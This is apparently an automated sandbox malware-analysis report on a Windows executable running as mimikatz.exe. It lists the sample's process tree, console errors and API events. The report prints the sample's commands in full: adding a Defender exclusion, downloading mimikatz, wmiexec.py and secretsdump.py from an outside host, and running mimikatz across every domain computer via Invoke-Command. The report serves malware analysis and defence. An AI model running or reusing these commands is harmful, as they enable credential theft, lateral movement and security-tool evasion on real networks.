Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 19, 2025, 10:36 a.m.	Feb. 19, 2025, 10:38 a.m.

Size	278.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`6b5c683727229742a54ef15742b1a351`
SHA256	`66d82a3bccedaa9b460c09359777464b491d136308538f8820aa8a6dfaa9aa45`
CRC32	`29282225`
ssdeep	`6144:VVU0b5qe7h9NDNPKFMuOP41ZtfNATzEWxuRoAOCJv/w:VOM7h9rKFMuOP41ZtfSyRoI9w`
PDB Path	Z:\Yoanna\Release\Yoanna.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Antivirus - Contains references to security software IsPE32 - (no description) Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file

mimikatz.exe "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
2556
- cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
  2672
  - powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
    2732
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
  2836
  - powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
    2896
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
  2980
  - powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
    3040
- cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
  1404
  - PING.EXE ping 1.1.1.1 -n 1 -w 3000
    2204
- python.exe python --version
  2108
- powershell.exe powershell -Command " $computers = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name Invoke-Command -ComputerName $computers -ScriptBlock { cmd /c 'if not exist C:\WinXRAR mkdir C:\WinXRAR && powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe && C:\WinXRAR\mimikatz.exe' } "
  2088
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
  2472
  - powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
    2596
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
  2684
  - powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
    2784
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
  2728
  - powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
    2952
- cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
  452
  - powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
    2984

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (48 events)

Time & API	Arguments	Status	Return
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 10:36 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (12 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0
IsDebuggerPresent Feb. 19, 2025, 10:36 a.m.			0	0

Command line console output was observed (50 out of 77 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: At line:1 char:18 console_handle: 0x00000047	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + Invoke-WebRequest <<<< -Uri https://xspacet.wiki/stein/Dpose.exe -Outfile C: console_handle: 0x00000053	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: \WinXRAR\Dpose.exe console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: ommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: At line:1 char:18 console_handle: 0x00000047	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + Invoke-WebRequest <<<< -Uri https://xspacet.wiki/stein/Bootxr.exe -Outfile C console_handle: 0x00000053	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: :\WinXRAR\Bootxr.exe console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: ommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\mimikatz.exe console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: Access is denied. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: The term 'Get-ADComputer' is not recognized as the name of a cmdlet, function, console_handle: 0x00000023	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: script file, or operable program. Check the spelling of the name, or if a path console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: At line:2 char:44 console_handle: 0x00000047	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + $computers = Get-ADComputer <<<< -Filter * \| Select-Object - console_handle: 0x00000053	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: ExpandProperty Name console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Get-ADComputer:String) [], Comm console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: andNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: Invoke-Command : Cannot validate argument on parameter 'ComputerName'. The argu console_handle: 0x000000a3	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: ment is null or empty. Supply an argument that is not null or empty and then tr console_handle: 0x000000af	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: y the command again. console_handle: 0x000000bb	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: At line:3 char:45 console_handle: 0x000000c7	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + Invoke-Command -ComputerName <<<< $computers -ScriptBlock { console_handle: 0x000000d3	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: cmd /c 'if not exist C:\WinXRAR mkdir C:\WinXRAR && powershell Invoke-WebReques console_handle: 0x000000df	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: t -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe console_handle: 0x000000eb	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: && C:\WinXRAR\mimikatz.exe' } console_handle: 0x000000f7	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + CategoryInfo : InvalidData: (:) [Invoke-Command], ParameterBind console_handle: 0x00000103	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: ingValidationException console_handle: 0x0000010f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Power console_handle: 0x0000011b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: Shell.Commands.InvokeCommandCommand console_handle: 0x00000127	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: At line:1 char:18 console_handle: 0x00000047	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + Invoke-WebRequest <<<< -Uri https://xspacet.wiki/stein/wmiexec.py -Outfile C console_handle: 0x00000053	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: :\WinXRAR\wmiexec.py console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: ommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Feb. 19, 2025, 10:36 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 368 events)

Time & API	Arguments	Status	Return
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00502ef0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00502eb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00502eb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00502eb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00502ab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005037f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00503730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b80d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8190 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8190 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8190 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 10:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8190 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

Z:\Yoanna\Release\Yoanna.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 19, 2025, 10:36 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1094 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02062000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02072000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0209a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02073000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 10:36 a.m.	process_identifier: 2732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02074000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
